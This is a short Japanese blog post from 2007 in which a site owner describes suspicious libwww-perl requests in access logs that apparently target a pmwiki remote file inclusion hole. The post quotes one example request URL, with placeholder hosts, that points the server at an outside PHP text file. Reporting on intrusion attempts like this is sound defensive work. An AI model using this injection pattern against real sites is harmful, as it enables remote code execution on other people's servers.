あやしいUserAgent

あやしいUserAgent
 このところ怪しいUserAgentのアクセスがあります。
そこで気になったのが、http://www.example.com/target.jpg/?http://www.example.jp/control.txt? こんな感じで、control.txtのあるドメイン側のテキストファイルを開くと画像のようにPHPソースが書かれていました。(画像側は怪しいのでアクセスしていません。調べる際には、aguseを利用しています。)
 調べてみたところ「pmwiki」のセキュリティホールを狙った様で「pmwiki.php?」とファイルを名指ししてきていました。また、Perlモジュールの「libwww-perl」を利用しているようです。元々「libwww-perl」は、Webサーバにアクセスして、リンク切れをチェックしたり、ミラーリングしたり便利なものです。不正な利用を行われると残念です。その結果Googleに対して「libwww-perl」のUserAgentでアクセスすると、403エラーではじかれます。(ただし、UserAgentの変更でGoogleへのアクセス問題の対処は可能です。)

 ちなみに、画像のPHPソースのテキストファイルは、日本のホスティングサーバで、輸入家具に関するページにアップされていました。
 このファイル自体の存在に関して、良いのか悪いのかはわかりませんが、以前にも別のホスティングサーバで、同一のファイルがあったのを覚えています。ちなみに、このホスティングサーバは、以前お世話になった会社が利用しているサーバであったりします。

 それにしても、リアルでもネットでもまじめにやると損ばかりな気がしてきてなりません。


2007/12/21追記:
aguseのドメインが変更になったため、aguse.netからaguse.jpへ修正しました。
2007.10.06